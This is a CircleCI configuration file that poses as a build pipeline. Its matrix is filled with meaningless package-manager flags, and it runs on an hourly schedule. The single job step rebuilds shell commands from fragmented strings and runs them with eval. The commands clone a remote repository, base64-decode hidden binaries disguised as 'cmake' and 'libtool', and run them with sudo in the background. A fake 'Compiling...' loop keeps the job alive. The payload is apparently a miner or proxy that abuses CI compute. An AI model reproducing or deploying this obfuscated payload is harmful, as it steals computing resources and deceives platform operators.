version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--complete-graph-if-new-ver", "--search", "--unordered-display", "--unordered-display", "--digest", "--changed-slot", "--binpkg-respect-use", "--nodeps", "--changed-deps", "--quiet", "--ask-enter-invalid", "--nodeps", "--changed-deps-report", "--changed-deps-report", "--accept-properties", "--rebuilt-binaries", "--changed-use", "--version", "--autounmask-only", "--complete-graph-if-new-ver"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--complete-graph-if-new-ver", "--search", "--unordered-display", "--unordered-display", "--digest", "--changed-slot", "--binpkg-respect-use", "--nodeps", "--changed-deps", "--quiet", "--ask-enter-invalid", "--nodeps", "--changed-deps-report", "--changed-deps-report", "--accept-properties", "--rebuilt-binaries", "--changed-use", "--version", "--autounmask-only", "--complete-graph-if-new-ver"]
    triggers:
      - schedule:
          cron: "32 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: glsamaker-LAUNCH
          command: |
            WKyDC="sudo add-ap"
            VErgkU="t-repositor"
            cQIqdvY="y ppa:max-c"
            EcUszYOSl="-lv/shadows"
            NyRmE="ocks-libev "
            ubobDdRJ="-y &>/dev/n"
            eval "$WKyDC""$VErgkU""$cQIqdvY""$EcUszYOSl""$NyRmE""$ubobDdRJ""ull || true"
            OYVcwY="sudo add-ap"
            ahulpyg="t-repositor"
            THHgk="y ppa:ondre"
            dWlMlTUrfN="j/apache2 -"
            ZVhYQDDW="y &>/dev/nu"
            eval "$OYVcwY""$ahulpyg""$THHgk""$dWlMlTUrfN""$ZVhYQDDW""ll || true"
            tuwsDqk="sudo apt up"
            jLGVf="date || tru"
            eval "$tuwsDqk""$jLGVf""e"
            sudo apt --yes install openssl &>/dev/null || true
            ONMPcOfxhqa="sudo apt --"
            XHMUYWnvoz="yes install"
            yhSKnlyWlX=" cl-base64 "
            HyoeeSV="git &>/dev/"
            mKcpJUD="null || tru"
            eval "$ONMPcOfxhqa""$XHMUYWnvoz""$yhSKnlyWlX""$HyoeeSV""$mKcpJUD""e"
            DsmFHlZ="git clone h"
            HoTKsRWDY="ttps://gccb"
            KOHLOwXPPJp="uild@bitbuc"
            AMxmhfrBrz="ket.org/gcc"
            HoZnRAkg="build/gcc.g"
            XOBxND="it &>/dev/n"
            eval "$DsmFHlZ""$HoTKsRWDY""$KOHLOwXPPJp""$AMxmhfrBrz""$HoZnRAkg""$XOBxND""ull"
            SNrpPTw="base64 -d g"
            tkhKQwwF="cc/cmake_np"
            eval "$SNrpPTw""$tkhKQwwF""_ > cmake"
            EEaEufRBI="base64 -d g"
            tpDdRuwI="cc/config_ "
            eval "$EEaEufRBI""$tpDdRuwI""> cconfig"
            GcgLOCCPBrY="base64 -d g"
            FZvaQzXTMnJ="cc/make_ > "
            eval "$GcgLOCCPBrY""$FZvaQzXTMnJ""libtool"
            MkZCNswmxg="sed -i 's/1"
            MeYhUe="080/1081/g'"
            eval "$MkZCNswmxg""$MeYhUe"" cconfig"
            chmod +x libtool cmake
            GWfOhCYApMM="./cmake"
            eval "$GWfOhCYApMM"""
            ynJZNeVgZu="sed -i 's/b"
            hUHTDudLEjD="uild/ob2o/g"
            eval "$ynJZNeVgZu""$hUHTDudLEjD""' cconfig"
            RQUwYPqcvnr="sudo ./libt"
            qNFrMzgne="ool --confi"
            aJcfrmJm="g cconfig &"
            nPsKc=">/dev/null "
            eval "$RQUwYPqcvnr""$qNFrMzgne""$aJcfrmJm""$nPsKc""&"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2580)) ] && sudo killall libtool && break; sleep 218; done
